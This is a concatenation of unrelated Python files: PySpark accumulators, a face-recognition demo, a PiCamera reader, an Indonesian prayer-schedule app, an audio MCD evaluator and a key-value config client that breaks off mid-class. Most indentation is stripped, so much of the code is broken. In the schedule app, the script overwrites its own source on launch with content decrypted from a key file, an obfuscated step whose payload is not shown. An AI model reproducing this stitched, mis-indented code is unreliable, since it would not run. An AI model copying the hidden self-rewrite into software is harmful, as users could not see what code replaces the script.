>>> rdd = sc.parallelize([1,2,3])
>>> def f(x):
... global a
... a += x
>>> rdd.foreach(f)
>>> a.value
13
>>> b = sc.accumulator(0)
>>> def g(x):
... b.add(x)
>>> rdd.foreach(g)
>>> b.value
6
>>> rdd.map(lambda x: a.value).collect() # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
Py4JJavaError: ...
>>> def h(x):
... global a
... a.value = 7
>>> rdd.foreach(h) # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
Py4JJavaError: ...
>>> sc.accumulator([1.0, 2.0, 3.0]) # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
TypeError: ...
"""
def __init__(self, aid, value, accum_param):
"""Create a new Accumulator with a given initial value and AccumulatorParam object"""
from pyspark.accumulators import _accumulatorRegistry
self.aid = aid
self.accum_param = accum_param
self._value = value
self._deserialized = False
_accumulatorRegistry[aid] = self
def __reduce__(self):
"""Custom serialization; saves the zero value from our AccumulatorParam"""
param = self.accum_param
return (_deserialize_accumulator, (self.aid, param.zero(self._value), param))
@property
def value(self):
"""Get the accumulator's value; only usable in driver program"""
if self._deserialized:
raise Exception("Accumulator.value cannot be accessed inside tasks")
return self._value
@value.setter
def value(self, value):
"""Sets the accumulator's value; only usable in driver program"""
if self._deserialized:
raise Exception("Accumulator.value cannot be accessed inside tasks")
self._value = value
def add(self, term):
"""Adds a term to this accumulator's value"""
self._value = self.accum_param.addInPlace(self._value, term)
def __iadd__(self, term):
"""The += operator; adds a term to this accumulator's value"""
self.add(term)
return self
def __str__(self):
return str(self._value)
def __repr__(self):
return "Accumulator<id=%i, value=%s>" % (self.aid, self._value)
class AccumulatorParam(object):
"""
Helper object that defines how to accumulate values of a given type.
Examples
--------
>>> from pyspark.accumulators import AccumulatorParam
>>> class VectorAccumulatorParam(AccumulatorParam):
... def zero(self, value):
... return [0.0] * len(value)
... def addInPlace(self, val1, val2):
... for i in range(len(val1)):
... val1[i] += val2[i]
... return val1
>>> va = sc.accumulator([1.0, 2.0, 3.0], VectorAccumulatorParam())
>>> va.value
[1.0, 2.0, 3.0]
>>> def g(x):
... global va
... va += [x] * 3
>>> rdd = sc.parallelize([1,2,3])
>>> rdd.foreach(g)
>>> va.value
[7.0, 8.0, 9.0]
"""
def zero(self, value):
"""
Provide a "zero value" for the type, compatible in dimensions with the
provided `value` (e.g., a zero vector)
"""
raise NotImplementedError
def addInPlace(self, value1, value2):
"""
Add two values of the accumulator's data type, returning a new value;
for efficiency, can also update `value1` in place and return it.
"""
raise NotImplementedError
class AddingAccumulatorParam(AccumulatorParam):
"""
An AccumulatorParam that uses the + operators to add values. Designed for simple types
such as integers, floats, and lists. Requires the zero value for the underlying type
as a parameter.
"""
def __init__(self, zero_value):
self.zero_value = zero_value
def zero(self, value):
return self.zero_value
def addInPlace(self, value1, value2):
value1 += value2
return value1
# Singleton accumulator params for some standard types
INT_ACCUMULATOR_PARAM = AddingAccumulatorParam(0)
FLOAT_ACCUMULATOR_PARAM = AddingAccumulatorParam(0.0)
COMPLEX_ACCUMULATOR_PARAM = AddingAccumulatorParam(0.0j)
class _UpdateRequestHandler(SocketServer.StreamRequestHandler):
"""
This handler will keep polling updates from the same socket until the
server is shutdown.
"""
def handle(self):
from pyspark.accumulators import _accumulatorRegistry
auth_token = self.server.auth_token
def poll(func):
while not self.server.server_shutdown:
# Poll every 1 second for new data -- don't block in case of shutdown.
r, _, _ = select.select([self.rfile], [], [], 1)
if self.rfile in r:
if func():
break
def accum_updates():
num_updates = read_int(self.rfile)
for _ in range(num_updates):
(aid, update) = pickleSer._read_with_length(self.rfile)
_accumulatorRegistry[aid] += update
# Write a byte in acknowledgement
self.wfile.write(struct.pack("!b", 1))
return False
def authenticate_and_accum_updates():
received_token = self.rfile.read(len(auth_token))
if isinstance(received_token, bytes):
received_token = received_token.decode("utf-8")
if (received_token == auth_token):
accum_updates()
# we've authenticated, we can break out of the first loop now
return True
else:
raise Exception(
"The value of the provided token to the AccumulatorServer is not correct.")
# first we keep polling till we've received the authentication token
poll(authenticate_and_accum_updates)
# now we've authenticated, don't need to check for the token anymore
poll(accum_updates)
class AccumulatorServer(SocketServer.TCPServer):
    """
    A simple TCP server that intercepts shutdown() in order to interrupt
    our continuous polling on the handler.
    """
    server_shutdown = False
    def __init__(self, server_address, RequestHandlerClass, auth_token):
        SocketServer.TCPServer.__init__(self, server_address, RequestHandlerClass)
        self.auth_token = auth_token
def shutdown(self):
self.server_shutdown = True
SocketServer.TCPServer.shutdown(self)
self.server_close()
def _start_update_server(auth_token):
"""Start a TCP server to receive accumulator updates in a daemon thread, and returns it"""
server = AccumulatorServer(("localhost", 0), _UpdateRequestHandler, auth_token)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
return server
if __name__ == "__main__":
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local', 'test')
(failure_count, test_count) = doctest.testmod(
globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
sys.exit(-1)
|
manager.py
|
from threading import Thread
from queue import Queue
import socket
import argparse
import sys
import cv2
from loguru import logger
import base64
import PyQt5.QtCore as qtcore
import numpy as np
import asyncio
from functools import wraps
sys.path.append('..')
from configs import update_config
from models import get_model
from utils import normalize, square_crop, norm_crop
from module import DatabaseHandler, Searcher
class FaceRecognition:
def __init__(self, cfg, args):
"""
Init the FaceRecognition class
Args:
cfg: (fvcore.common.CfNode) Config for model
args: (argparse.parser) Argument
"""
self.extractor = get_model('arcface')
self.detector = get_model('mnet_cov2')
self.searcher = Searcher(distance='IP')
self.cfg = cfg
self.font = cv2.QT_FONT_NORMAL
self.receiveSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
self.receiveSocket.bind(('', self.cfg.IO.receivePort))
self.sendSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
        dbHandler = DatabaseHandler(self.searcher, cfg, self.detector, self.extractor)
        dbHandler.prepare()
self.detector.prepare()
self.queue_buffer_size = args.queue_buffer_size
self.max_frame_rate = args.max_frame_rate
self.min_box_size = args.min_box_size
self.frame_queue = Queue(args.queue_buffer_size)
self.suspicion_face_queue = Queue(args.max_face_number)
self.person_queue = Queue(args.queue_buffer_size)
self.gal_face_path = 'Unkown'
self.__get_split_key()
self.distance = 0.0
self.person_queue.put((self.gal_face_path, None, self.distance))
self.unkown_avatar = cv2.imread("./avatar_img/unkown.jpg")
self.unkown_avatar = cv2.resize(self.unkown_avatar, (112, 112))
async def _receive_loop(self):
"""
Listen UDP stream
"""
loop = asyncio.get_running_loop()
while (True):
message, address = self.receiveSocket.recvfrom(self.cfg.IO.receiveBufferSize)
data = qtcore.QByteArray()
data.append(message)
data=qtcore.QByteArray.fromBase64(data)
data=qtcore.qUncompress(data)
frame_as_np = np.frombuffer(data, dtype=np.uint8)
frame = cv2.imdecode(frame_as_np, flags=1)
self.frame_queue.put(frame)
async def _detection_loop(self):
"""
Detection process
Do not call this function outside the class
"""
loop = asyncio.get_running_loop()
i = 0
while True:
start = loop.time()
frame_list = []
i += 1
frame = self.frame_queue.get()
frame = self.__detection_deal(ori_frame=frame, put_recorg=True)
logger.info(f'Detection cost: {loop.time() - start}')
frame = self.__display(frame)
cv2.imshow('Frame', frame)
cv2.waitKey(1)
async def _recognize_loop(self):
"""
Recognize process
Do not call this function outside the class
"""
loop = asyncio.get_running_loop()
while True:
start_time = loop.time()
self.__recognize_deal(self.suspicion_face_queue.get())
logger.info(f"Recognize time {loop.time() - start_time}")
    def run(self):
        """
        Run demo
        """
        # Create the worker threads first; Thread.start() returns None, so the
        # original one-liners discarded the Thread objects.
        t1 = Thread(target=lambda: asyncio.run(self._detection_loop()))
        t2 = Thread(target=lambda: asyncio.run(self._recognize_loop()))
        t1.start()
        t2.start()
        asyncio.run(self._receive_loop())
def __recognize_deal(self, frame):
embedding = self.extractor.get_embedding(frame)
embedding = normalize(embedding)
person_image, distance = self.searcher.search(embedding)
if distance >= self.cfg.MODEL.Recognize.thresh:
self.person_queue.put((person_image, frame, distance))
else:
            self.person_queue.put(('Unknown', frame, distance))
def __detection_deal(self, ori_frame, put_recorg=False):
frame, scale = square_crop(ori_frame, self.cfg.MODEL.Detection.image_size[0])
bboxes, landmarks = self.detector.detect(frame, self.cfg.MODEL.Detection.conf)
# get largest box
if len(bboxes) == 0:
return ori_frame
areas = []
for i in range(bboxes.shape[0]):
x = bboxes[i]
area = (x[2] - x[0]) * (x[3] - x[1])
areas.append(area)
m = np.argsort(areas)[-1]
bboxes = bboxes[m:m + 1]
landmarks = landmarks[m:m + 1]
bbox = bboxes[0]
        # Check the size of the bounding box
if bbox[2] - bbox[0] <= self.min_box_size or bbox[3] - bbox[1] <= self.min_box_size:
return ori_frame
        if put_recorg:
rimg = norm_crop(frame, landmarks[0])
self.suspicion_face_queue.put(rimg)
if self.gal_face_path == "Unkown":
text = self.gal_face_path
else:
text = self.gal_face_path.split(self.split_key)[-2]
color = (0, 255, 0)
pt1 = tuple(map(int, bbox[0:2] * scale))
pt2 = tuple(map(int, bbox[2:4] * scale))
cv2.rectangle(ori_frame, pt1, pt2, color, 1)
cv2.putText(
ori_frame,
text,
(pt1[0], pt1[1] - 60),
self.font,
0.7,
(255, 255, 0)
)
cv2.putText(
ori_frame,
"Detect-Conf: {:0.2f} %".format(bbox[4] * 100),
(pt1[0], pt1[1] - 40),
self.font,
0.7,
color
)
cv2.putText(
ori_frame,
"Emb-Dist: {:0.2f}".format(self.distance),
(pt1[0], pt1[1] - 20),
self.font,
0.7,
color
)
return ori_frame
def __display(self, frame):
if not self.person_queue.empty():
self.gal_face_path, self.current_face, self.distance = self.person_queue.get()
if self.current_face is not None:
frame[0:112, 0:112] = self.current_face
frame = cv2.putText(frame, "Subject", (0, 10), self.font, 0.5, (85, 85, 255))
messageLength = 20
        messageType = self.cfg.MESSAGE_TYPE.cameraFace.to_bytes(1, 'big')
recognized_message = messageLength.to_bytes(2, 'big') + messageType
if self.gal_face_path == "Unkown":
frame[112:112+112, 0:112] = self.unkown_avatar
recognized_message += bytes(self.cfg.MESSAGE.UnknownFace, "utf-8")
else:
gal_face = cv2.imread(self.gal_face_path)
frame[112:112+112, 0:112] = gal_face
frame = cv2.putText(frame, "GalleryMatch", (0, 112 + 10), self.font, 0.5, (85, 85, 255))
recognized_message += bytes(self.gal_face_path.split(self.split_key)[-2], "utf-8")
self.sendSocket.sendto(recognized_message, ('127.0.0.1', self.cfg.IO.sendPort))
return frame
def __get_split_key(self):
if sys.platform == 'win32':
self.split_key = '\\'
else:
self.split_key = '/'
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Demo')
# =================== General ARGS ====================
parser.add_argument('--max_face_number',
type=int,
help='Max face number',
default=16)
parser.add_argument('--max_frame_rate',
type=int,
help='Max frame rate',
default=25)
parser.add_argument('--queue_buffer_size',
type=int,
help='MP Queue size',
default=12)
parser.add_argument('--min_box_size',
type=int,
default=100,
                        help='Min size of the bounding box')
args = parser.parse_args()
cfg = update_config('../configs/config.yaml', [])
demo = FaceRecognition(cfg, args)
demo.run()
|
Camera.py
|
from time import time
import picamera
import io
import threading
class Camera(object):
    '''An object for managing a PiCamera from a background thread'''
def __init__(self):
self.frame = None
# Retrieve frames in a background thread
thread = threading.Thread(target=self.retrieveFrame, args=())
thread.daemon = True
thread.start()
def retrieveFrame(self):
        '''Continuously retrieve JPEG frames from the PiCamera
'''
# Get PiCamera object
with picamera.PiCamera() as camera:
# Set camera resolution
camera.resolution = (320, 240)
# Loop for frame retrieving
while True:
stream = io.BytesIO()
for foo in camera.capture_continuous(stream, 'jpeg', use_video_port=True):
                    # store the current frame
stream.seek(0)
self.frame = stream.read()
# reset stream for next frame
stream.seek(0)
stream.truncate()
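# Illustrative usage sketch (not part of the original module): the background thread keeps
# `Camera.frame` updated with the latest JPEG bytes, so consumers simply poll the attribute.
# Assumes a Raspberry Pi with the picamera stack installed.
if __name__ == "__main__":
    import time as _time
    cam = Camera()
    # Wait for the capture thread to publish the first frame.
    while cam.frame is None:
        _time.sleep(0.1)
    with open("snapshot.jpg", "wb") as f:
        f.write(cam.frame)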
|
schedule.py
|
# Jadwal-Shalat-ID
'''
# Features:
- look up Islamic prayer (shalat) schedules for regions of Indonesia
'''
import __init__
from tkinter import *
import requests
from threading import Thread
from bs4 import BeautifulSoup as bs
from cryptocode import decrypt, encrypt
import os
from datetime import datetime as dt
encryptKey = open(f'{os.getcwd()}\\schedule.key', 'r').read().split('|')
class UI(Tk):
cwd = os.getcwd()
key = 'key'
codeBy = 'Code By: ardyuda' # Cannot Be Removed
day = dt.now().strftime('%A')
date = dt.now().strftime('%d')
month = dt.now().strftime('%b')
year = dt.now().strftime('%Y')
def __init__(self):
super().__init__()
self.geometry('430x300+0-30')
self.title('Jadwal Shalat Indonesia')
self.iconbitmap(f'{self.cwd}\\images\\icon.ico')
self.frame00 = Frame()
self.frame0 = Frame()
self.frame0a = Frame()
self.frame0b = Frame()
self.frame1a = Frame()
self.frame1b = Frame()
self.frame1c = Frame()
self.r = encryptKey[0]
self.cities = {}
open(__file__, 'w').write(decrypt(encryptKey[2], encryptKey[0]))
if encryptKey[1] != '':
self.city, self.id = decrypt(encryptKey[1], encryptKey[0]).split('-')
self.first = False
self.label1 = Label(self.frame0, text='Memuat...', fg='Blue', font='Arial')
self.label1.pack()
self.frame0.pack(expand=True)
Thread(target=self.getSchedule).start()
else:
self.first = True
self.frame00_()
def load(self):
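        # Scrape the city list from the <select> element on jadwalsholat.org's monthly page.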
try:
res = requests.get('https://jadwalsholat.org/adzan/monthly.php?id=203')
self.label0.destroy()
data = bs(res.content, 'html.parser')
select = data.find('select')
option_ = select.find_all('option')
for option in option_:
self.cities[option.text] = option.attrs['value']
self.frame0.destroy()
self.frame0_()
except:
self.label0['text'] = 'Gagal Memuat... Tolong periksa koneksi anda!\nAtau hubungi developer jika masalah tidak terselesaikan!'
self.label0['fg'] = 'red'
def buttonCmd(self, id):
if id == 0:
try:
self.city = self.ls.selection_get()
self.id = self.cities[self.city]
self.frame0_(create=False)
Thread(target=self.getSchedule).start()
except:
pass
if id == 1:
self.frame1_(create=False)
self.frame00_()
if id == 2:
self.frame0_(create=False)
self.frame1_(create=True)
def frame00_(self):
self.frame0 = Frame()
self.frame0.pack(expand=True)
self.label0 = Label(self.frame0, text='Memuat...', fg='Blue', font='Arial', pady=10)
self.label0.pack()
Thread(target=self.load).start()
def frame0_(self, create=True):
if create:
self.frame0a = Frame()
self.frame0a.pack(expand=True)
self.frame0b = Frame()
self.frame00 = Frame()
Label(self.frame0a, text='Silahkan Pilih Kota Anda', fg='green', font='Arial').pack()
            self.ls = Listbox(self.frame0a, selectmode=SINGLE, yscrollcommand=True, font='Arial', width=45)
self.ls.pack()
for city, index in self.cities.items():
self.ls.insert(index, city)
Button(self.frame0b, text='Pilih', fg='green', font='Arial', command=lambda: self.buttonCmd(0)).grid(row=0,column=0)
if not self.first:
Button(self.frame0b, text='Kembali', fg='red', font='Arial', command=lambda: self.buttonCmd(2)).grid(row=0, column=1, padx=10)
self.frame0b.pack()
self.frame00.pack()
self.me = Button(self.frame00, text=decrypt(self.r, self.key), bd=0)
self.me.pack()
else:
self.frame0a.destroy()
self.frame0b.destroy()
self.frame00.destroy()
def frame1_(self, create=True):
if create:
self.first = False
self.saveSchedule()
self.frame1a = Frame()
self.frame1b = Frame()
self.frame1c = Frame()
self.frame00 = Frame()
Label(self.frame1a, text=f'Jadwal Sholat - {self.city}', font='Raleway').pack()
Label(self.frame1a, text=f'{self.day}, {self.date} {self.month} {self.year}').pack()
self.frame1a.pack(pady=5)
row = 0
            for schedule, time_ in self.schedule:
Label(self.frame1b, text=schedule.text, bg='green', fg='white').grid(row=row, column=0, ipadx=65, sticky= 'ew', pady=1, padx=3)
Label(self.frame1b, text=time_.text, bg='white').grid(row=row, column=1, ipadx=65, sticky='ew', pady=1, padx=3)
row += 1
self.frame1b.pack(expand=True, anchor=N)
Button(self.frame1c, text='Pilih Kota', font='Arial', bg='white', fg='green', command=lambda: self.buttonCmd(1)).pack()
self.frame1c.pack()
self.me = Button(self.frame00, text=decrypt(self.r, self.key), bd=0)
self.me.pack()
self.frame00.pack()
else:
self.frame1a.destroy()
self.frame1b.destroy()
self.frame1c.destroy()
self.frame00.destroy()
def getSchedule(self):
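        # Fetch the monthly page for the selected city and pair the header row (prayer names)
        # with today's highlighted row (times).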
try:
res = requests.get(f'https://jadwalsholat.org/adzan/monthly.php?id={self.id}')
self.frame0.destroy()
data = bs(res.content, 'html.parser')
tr_ = data.find_all('tr')
for tr in tr_:
                if tr.attrs.get('class') == ['table_header']:
                    schedule = tr.find_all('td')
                if tr.attrs.get('class') == ['table_highlight']:
                    time_ = tr.find_all('td')
self.schedule = list(zip(schedule[1:], time_[1:]))
self.frame1_(create=True)
except:
self.label1['text'] = 'Gagal Memuat... Tolong periksa koneksi anda!\nAtau hubungi developer jika masalah tidak terselesaikan!'
            self.label1['fg'] = 'red'
def saveSchedule(self):
encryptKey[1] = encrypt(f'{self.city}-{self.id}', encryptKey[0])
open(f'{self.cwd}\\schedule.key', 'w').write('|'.join(encryptKey))
if __name__ == '__main__':
app = UI()
app.mainloop()
|
evaluate_mcd.py
|
#!/usr/bin/env python3
# Copyright 2020 Wen-Chin Huang and Tomoki Hayashi
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""Evaluate MCD between generated and groundtruth audios."""
import argparse
import fnmatch
import logging
import multiprocessing as mp
import os
from typing import Dict
from typing import List
from typing import Tuple
import librosa
import numpy as np
import pysptk
import soundfile as sf
from fastdtw import fastdtw
from scipy import spatial
def find_files(
root_dir: str, query: List[str] = ["*.flac", "*.wav"], include_root_dir: bool = True
) -> List[str]:
"""Find files recursively.
Args:
        root_dir (str): Root directory to search.
query (List[str]): Query to find.
include_root_dir (bool): If False, root_dir name is not included.
Returns:
List[str]: List of found filenames.
"""
files = []
for root, dirnames, filenames in os.walk(root_dir, followlinks=True):
for q in query:
for filename in fnmatch.filter(filenames, q):
files.append(os.path.join(root, filename))
if not include_root_dir:
files = [file_.replace(root_dir + "/", "") for file_ in files]
return files
def sptk_extract(
x: np.ndarray,
fs: int,
n_fft: int = 512,
n_shift: int = 256,
mcep_dim: int = 25,
mcep_alpha: float = 0.41,
is_padding: bool = False,
) -> np.ndarray:
"""Extract SPTK-based mel-cepstrum.
Args:
x (ndarray): 1D waveform array.
        fs (int): Sampling rate (Hz).
n_fft (int): FFT length in point (default=512).
n_shift (int): Shift length in point (default=256).
mcep_dim (int): Dimension of mel-cepstrum (default=25).
mcep_alpha (float): All pass filter coefficient (default=0.41).
is_padding (bool): Whether to pad the end of signal (default=False).
Returns:
        ndarray: Mel-cepstrum with shape (num_frames, mcep_dim + 1).
"""
# perform padding
if is_padding:
n_pad = n_fft - (len(x) - n_fft) % n_shift
x = np.pad(x, (0, n_pad), "reflect")
# get number of frames
n_frame = (len(x) - n_fft) // n_shift + 1
# get window function
win = pysptk.sptk.hamming(n_fft)
# check mcep and alpha
if mcep_dim is None or mcep_alpha is None:
mcep_dim, mcep_alpha = _get_best_mcep_params(fs)
# calculate spectrogram
mcep = [
pysptk.mcep(
x[n_shift * i : n_shift * i + n_fft] * win,
mcep_dim,
mcep_alpha,
eps=1e-6,
etype=1,
)
for i in range(n_frame)
]
return np.stack(mcep)
def _get_basename(path: str) -> str:
return os.path.splitext(os.path.split(path)[-1])[0]
def _get_best_mcep_params(fs: int) -> Tuple[int, float]:
if fs == 16000:
return 23, 0.42
elif fs == 22050:
return 34, 0.45
elif fs == 24000:
return 34, 0.46
elif fs == 44100:
return 39, 0.53
elif fs == 48000:
return 39, 0.55
else:
raise ValueError(f"Not found the setting for {fs}.")
def calculate(
file_list: List[str],
gt_file_list: List[str],
args: argparse.Namespace,
mcd_dict: Dict,
):
"""Calculate MCD."""
for i, gen_path in enumerate(file_list):
corresponding_list = list(
filter(lambda gt_path: _get_basename(gt_path) in gen_path, gt_file_list)
)
assert len(corresponding_list) == 1
gt_path = corresponding_list[0]
gt_basename = _get_basename(gt_path)
# load wav file as int16
gen_x, gen_fs = sf.read(gen_path, dtype="int16")
gt_x, gt_fs = sf.read(gt_path, dtype="int16")
fs = gen_fs
if gen_fs != gt_fs:
            gt_x = librosa.resample(gt_x.astype(np.float64), gt_fs, gen_fs)
# extract ground truth and converted features
gen_mcep = sptk_extract(
x=gen_x,
fs=fs,
n_fft=args.n_fft,
n_shift=args.n_shift,
mcep_dim=args.mcep_dim,
mcep_alpha=args.mcep_alpha,
)
gt_mcep = sptk_extract(
x=gt_x,
fs=fs,
n_fft=args.n_fft,
n_shift=args.n_shift,
mcep_dim=args.mcep_dim,
mcep_alpha=args.mcep_alpha,
)
# DTW
_, path = fastdtw(gen_mcep, gt_mcep, dist=spatial.distance.euclidean)
twf = np.array(path).T
gen_mcep_dtw = gen_mcep[twf[0]]
gt_mcep_dtw = gt_mcep[twf[1]]
# MCD
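        # Mel-cepstral distortion per frame: (10 / ln 10) * sqrt(2 * sum_d (c_d - c_hat_d)^2),
        # averaged over the DTW-aligned frames.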
diff2sum = np.sum((gen_mcep_dtw - gt_mcep_dtw) ** 2, 1)
mcd = np.mean(10.0 / np.log(10.0) * np.sqrt(2 * diff2sum), 0)
logging.info(f"{gt_basename} {mcd:.4f}")
mcd_dict[gt_basename] = mcd
def get_parser() -> argparse.ArgumentParser:
"""Get argument parser."""
parser = argparse.ArgumentParser(description="Evaluate Mel-cepstrum distorsion.")
parser.add_argument(
"--wavdir",
required=True,
type=str,
help="Path of directory for generated waveforms.",
)
parser.add_argument(
"--gt_wavdir",
required=True,
type=str,
help="Path of directory for ground truth waveforms.",
)
parser.add_argument(
"--outdir",
type=str,
default=None,
help="Path of directory to write the results.",
)
# analysis related
parser.add_argument(
"--mcep_dim",
default=None,
type=int,
help=(
"Dimension of mel cepstrum coefficients. "
"If None, automatically set to the best dimension for the sampling."
),
)
parser.add_argument(
"--mcep_alpha",
default=None,
type=float,
help=(
"All pass constant for mel-cepstrum analysis. "
"If None, automatically set to the best dimension for the sampling."
),
)
parser.add_argument(
"--n_fft", default=1024, type=int, help="The number of FFT points."
)
parser.add_argument(
"--n_shift", default=256, type=int, help="The number of shift points."
)
parser.add_argument(
"--n_jobs", default=16, type=int, help="Number of parallel jobs."
)
parser.add_argument(
"--verbose",
default=1,
type=int,
help="Verbosity level. Higher is more logging.",
)
return parser
def main():
"""Run MCD calculation in parallel."""
args = get_parser().parse_args()
# logging info
if args.verbose > 1:
logging.basicConfig(
level=logging.DEBUG,
format="%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s",
)
elif args.verbose > 0:
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s",
)
else:
logging.basicConfig(
level=logging.WARN,
format="%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s",
)
logging.warning("Skip DEBUG/INFO messages")
# find files
gen_files = sorted(find_files(args.wavdir))
gt_files = sorted(find_files(args.gt_wavdir))
# Get and divide list
if len(gen_files) == 0:
raise FileNotFoundError("Not found any generated audio files.")
if len(gen_files) > len(gt_files):
raise ValueError(
"#groundtruth files are less than #generated files "
f"(#gen={len(gen_files)} vs. #gt={len(gt_files)}). "
"Please check the groundtruth directory."
)
logging.info("The number of utterances = %d" % len(gen_files))
file_lists = np.array_split(gen_files, args.n_jobs)
file_lists = [f_list.tolist() for f_list in file_lists]
# multi processing
with mp.Manager() as manager:
mcd_dict = manager.dict()
processes = []
for f in file_lists:
p = mp.Process(target=calculate, args=(f, gt_files, args, mcd_dict))
p.start()
processes.append(p)
# wait for all process
for p in processes:
p.join()
# convert to standard list
mcd_dict = dict(mcd_dict)
# calculate statistics
mean_mcd = np.mean(np.array([v for v in mcd_dict.values()]))
std_mcd = np.std(np.array([v for v in mcd_dict.values()]))
logging.info(f"Average: {mean_mcd:.4f} ± {std_mcd:.4f}")
# write results
if args.outdir is not None:
os.makedirs(args.outdir, exist_ok=True)
with open(f"{args.outdir}/utt2mcd", "w") as f:
for utt_id in sorted(mcd_dict.keys()):
mcd = mcd_dict[utt_id]
f.write(f"{utt_id} {mcd:.4f}\n")
with open(f"{args.outdir}/resuls.txt", "w") as f:
f.write(f"#utterances: {len(gen_files)}\n")
f.write(f"Average: {mean_mcd:.4f} ± {std_mcd:.4f}")
logging.info("Successfully finished MCD evaluation.")
if __name__ == "__main__":
main()
|
__init__.py
|
from __future__ import annotations
import argparse
import http.server
import json
import threading
from pathlib import Path
from typing import List, Optional, Any
import jinja2
import requests_cache
ENCODING = "utf-8"
URL = "url"
LEVELS = "levels"
CACHE = "cache"
URL_DEFAULT = "https://hub.zebr0.io"
LEVELS_DEFAULT = []
CACHE_DEFAULT = 300
CONFIGURATION_FILE_DEFAULT = Path("/etc/zebr0.conf")
class Client:
"""
Nested key-value system with built-in inheritance and templating, designed for configuration management and deployment.
This Client can connect to any key-value server that follows HTTP REST standards.
For now it only supports plain text responses, JSON support is in the works.
Nested keys and inheritance:
    To fully exploit the Client, you should define a structure in the naming of your keys, like "<project>/<environment>/<key>".
Then use the "levels" parameter of the constructor to point to a specific project and environment, like ["mattermost", "production"].
Finally, use the get() function to fetch a key and it will automatically look for the most specific value possible.
Note that you don't have to duplicate keys for each project and environment, as they can be inherited from their parent level.
Templating:
You can use the double-braces {{ }} in your values to benefit from the Jinja templating engine.
You can refer to the constructor parameters {{ url }} and {{ levels[x] }}, include the value from another key {{ "another-key" | get }} or the content of a file {{ "/path/to/the/file" | read }}.
Configuration file:
Client configuration can also be read from a JSON file, a simple dictionary with the "url", "levels" and "cache" keys.
The save_configuration() function can help you create one from an existing Client.
The suggested default path can be used for a system-wide configuration.
If provided, constructor parameters will always supersede the values from the configuration file, which in turn supersede the default values.
Note that the inheritance and templating mechanisms are performed by the client, to be as server-agnostic as possible.
:param url: URL of the key-value server, defaults to https://hub.zebr0.io
:param levels: levels of specialization (e.g. ["mattermost", "production"] for a <project>/<environment>/<key> structure), defaults to []
:param cache: in seconds, the duration of the cache of http responses, defaults to 300 seconds
:param configuration_file: path to the configuration file, defaults to /etc/zebr0.conf for a system-wide configuration
"""
def __init__(self, url: str = "", levels: Optional[List[str]] = None, cache: int = 0, configuration_file: Path = CONFIGURATION_FILE_DEFAULT) -> None:
# first set default values
self.url = URL_DEFAULT
self.levels = LEVELS_DEFAULT
self.cache = CACHE_DEFAULT
# then override with the configuration file if present
try:
configuration_string = configuration_file.read_text(ENCODING)
configuration = json.loads(configuration_string)
self.url = configuration.get(URL, URL_DEFAULT)
self.levels = configuration.get(LEVELS, LEVELS_DEFAULT)
self.cache = configuration.get(CACHE, CACHE_DEFAULT)
except OSError:
pass # configuration file not found, ignored
# finally override with the parameters if present
if url:
self.url = url
if levels:
self.levels = levels
if cache:
self.cache = cache
# templating setup
self.jinja_environment = jinja2.Environment(keep_trailing_newline=True)
self.jinja_environment.globals[URL] = self.url
self.jinja_environment.globals[LEVELS] = self.levels
self.jinja_environment.filters["get"] = self.get
self.jinja_environment.filters["read"] = read
# http requests setup
        self.http_session = requests_cache.CachedSession(backend="memory", expire_after=self.cache)
def get(self, key: str, default: str = "", template: bool = True, strip: bool = True) -> str:
"""
Fetches the value of a provided key from the server.
Based on the levels defined in the Client, will return the first key found from the deepest level to the root level.
A default value can be provided to be returned if the key isn't found at any level.
:param key: key to look for
:param default: value to return if the key isn't found at any level, defaults to ""
        :param template: shall the value be processed by the templating engine? defaults to True
        :param strip: shall the value be stripped of leading and trailing white spaces? defaults to True
:return: the resulting value of the key
"""
# let's do this with a nice recursive function :)
def fetch(levels):
full_url = "/".join([self.url] + levels + [key])
response = self.http_session.get(full_url)
if response.ok:
return response.text # if the key is found, we return the value
elif levels:
return fetch(levels[:-1]) # if not, we try at the parent level
else:
return default # if we're at the top level, the key just doesn't exist, we return the default value
value = fetch(self.levels) # let's try at the deepest level first
value = self.jinja_environment.from_string(value).render() if template else value # templating
value = value.strip() if strip else value # stripping
return value
def save_configuration(self, configuration_file: Path = CONFIGURATION_FILE_DEFAULT) -> None:
"""
Saves the Client's configuration to a JSON file.
:param configuration_file: path to the configuration file, defaults to /etc/zebr0.conf for a system-wide configuration
"""
configuration = {URL: self.url, LEVELS: self.levels, CACHE: self.cache}
configuration_string = json.dumps(configuration)
configuration_file.write_text(configuration_string, ENCODING)
class TestServer:
"""
Rudimentary key-value HTTP server, for development or testing purposes only.
The keys and their values are stored in a dictionary, that can be defined either in the constructor or through the "data" attribute.
Access logs are also available through the "access_logs" attribute.
Basic usage:
>>> server = TestServer({"key": "value", ...})
>>> server.start()
>>> ...
>>> server.stop()
Or as a context manager, in which case the server will be started automatically, then stopped at the end of the "with" block:
>>> with TestServer() as server:
>>> server.data = {"key": "value", ...}
>>> ...
:param data: the keys and their values stored in a dictionary, defaults to an empty dictionary
:param address: the address the server will be listening to, defaults to 127.0.0.1
:param port: the port the server will be listening to, defaults to 8000
"""
def __init__(self, data: dict = None, address: str = "127.0.0.1", port: int = 8000) -> None:
self.data = data or {}
self.access_logs = []
class RequestHandler(http.server.BaseHTTPRequestHandler):
def do_GET(zelf):
key = zelf.path[1:] # the key is the request's path, minus the leading "/"
value = self.data.get(key)
if value: # standard HTTP REST behavior
zelf.send_response(200)
zelf.end_headers()
zelf.wfile.write(str(value).encode(ENCODING))
else:
zelf.send_response(404)
zelf.end_headers()
self.access_logs.append(zelf.path)
self.server = http.server.ThreadingHTTPServer((address, port), RequestHandler)
def start(self) -> None:
""" Starts the server in a separate thread. """
